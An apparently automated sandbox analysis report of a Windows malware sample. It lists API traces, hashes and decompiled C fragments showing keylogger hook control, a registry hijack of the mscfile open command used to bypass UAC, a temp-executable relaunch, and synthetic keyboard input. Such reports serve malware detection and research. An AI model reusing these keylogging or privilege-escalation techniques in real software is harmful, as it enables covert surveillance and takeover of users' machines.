                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                                                                • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                                                                • Sleep.KERNEL32(00002710), ref: 00411B48
                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                                                                • String ID: Alarm has been triggered!$[ALARM]
                                                                                • API String ID: 4004766653-1190268461
                                                                                • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                                                                • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                                                                • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                                                                • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D8FF, Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 50%
                                                                                			E0040D8FF() {
				void* _t10;
				char* _t12;
				int _t13;
				char* _t15;
				signed int _t16;
				char* _t18;
				void* _t41;
				void* _t46;
				intOrPtr _t51;

				_t51 =  *0x41bf20; // 0x0
				 *0x41c119 = 0;
				if(_t51 != 0) {
					E004020F4(_t10, 0x41bf20);
				}
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t13 = atoi(_t12);
				E0040F572();
				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t16 = atoi(_t15);
				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
				E004017DD(_t46 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}












                                                                                0x0040d901
                                                                                0x0040d907
                                                                                0x0040d90d
                                                                                0x0040d914
                                                                                0x0040d914
                                                                                0x0040d928
                                                                                0x0040d933
                                                                                0x0040d93a
                                                                                0x0040d947
                                                                                0x0040d94c
                                                                                0x0040d957
                                                                                0x0040d95e
                                                                                0x0040d965
                                                                                0x0040d973
                                                                                0x0040d97a
                                                                                0x0040d985
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                                                                • atoi.MSVCRT ref: 0040D947
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                                                                • atoi.MSVCRT ref: 0040D965
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                                                                • atoi.MSVCRT ref: 0040D981
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 004020F4: #3.WS2_32(0041BE70,0041BE70,004021ED,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004020F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@
                                                                                • String ID:
                                                                                • API String ID: 705801113-0
                                                                                • Opcode ID: 7fad3e1c8d02ddd56982f4bb6be155314c8ce40a5711a40228cd6dab6938a153
                                                                                • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                                                                • Opcode Fuzzy Hash: 7fad3e1c8d02ddd56982f4bb6be155314c8ce40a5711a40228cd6dab6938a153
                                                                                • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004031F8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                                                                  • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                                                                  • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                                                                  • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                                                                  • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                                                                • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                                                                • API String ID: 1883807236-2313358711
                                                                                • Opcode ID: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                                                                • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                                                                • Opcode Fuzzy Hash: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                                                                • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                                                                • String ID: .exe$WDH$exepath$open$temp_
                                                                                • API String ID: 3885969548-3088914985
                                                                                • Opcode ID: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                                                                • Instruction ID: 60cde0a6a469a490c1b109ae90cccba4ec5744e34f2951ce39ed213dd0605107
                                                                                • Opcode Fuzzy Hash: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                                                                • Instruction Fuzzy Hash: 2001D233740314A7DB0097949C59FEB7368DF84351F2040B7BA56A61D1DFB858D187AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405CCA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 19%
                                                                                			E00405CCA(struct HHOOK__** __ecx) {
				char _v5;
				char _v6;
				void* _t9;
				struct HHOOK__* _t16;
				struct HHOOK__** _t30;

				_push(__ecx);
				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					_t9 = 0;
				} else {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
					_t30[0xf] = 0;
					_t6 =  &(_t30[0xd]); // 0x0
					_t30[0xa] = 0;
					CloseHandle( *_t6);
					if(_t30[0xf] == 0) {
						_t16 =  *_t30;
						if(_t16 != 0) {
							UnhookWindowsHookEx(_t16);
							 *_t30 = 0;
						}
					}
					_t9 = 1;
				}
				return _t9;
			}








                                                                                0x00405ccd
                                                                                0x00405cd0
                                                                                0x00405cd8
                                                                                0x00405d49
                                                                                0x00405cda
                                                                                0x00405ce9
                                                                                0x00405cf1
                                                                                0x00405d00
                                                                                0x00405d14
                                                                                0x00405d1a
                                                                                0x00405d22
                                                                                0x00405d25
                                                                                0x00405d28
                                                                                0x00405d2b
                                                                                0x00405d34
                                                                                0x00405d36
                                                                                0x00405d3a
                                                                                0x00405d3d
                                                                                0x00405d43
                                                                                0x00405d43
                                                                                0x00405d3a
                                                                                0x00405d45
                                                                                0x00405d45
                                                                                0x00405d4f

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                                                                  • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                  • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                  • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                  • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                                                                  • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                  • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                  • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                  • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                                                                • String ID: Online Keylogger Stopped$[INFO]
                                                                                • API String ID: 2254939683-2146459034
                                                                                • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                                                                • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                                                                • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                                                                • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410440, Relevance: 12.1, APIs: 8, Instructions: 86keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InputSend
                                                                                • String ID:
                                                                                • API String ID: 3431551938-0
                                                                                • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                                                                • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                                                                • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                                                                • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041000F, Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@??1?$basic_string@$G@1@@V01@@$G@2@@0@Hstd@@V01@V10@V?$basic_string@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 2253030544-0
                                                                                • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
